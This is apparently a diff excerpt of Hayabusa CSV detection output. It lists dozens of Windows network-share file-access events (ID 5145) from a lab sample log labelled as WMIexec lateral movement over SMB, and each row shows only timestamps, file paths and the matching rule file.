+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
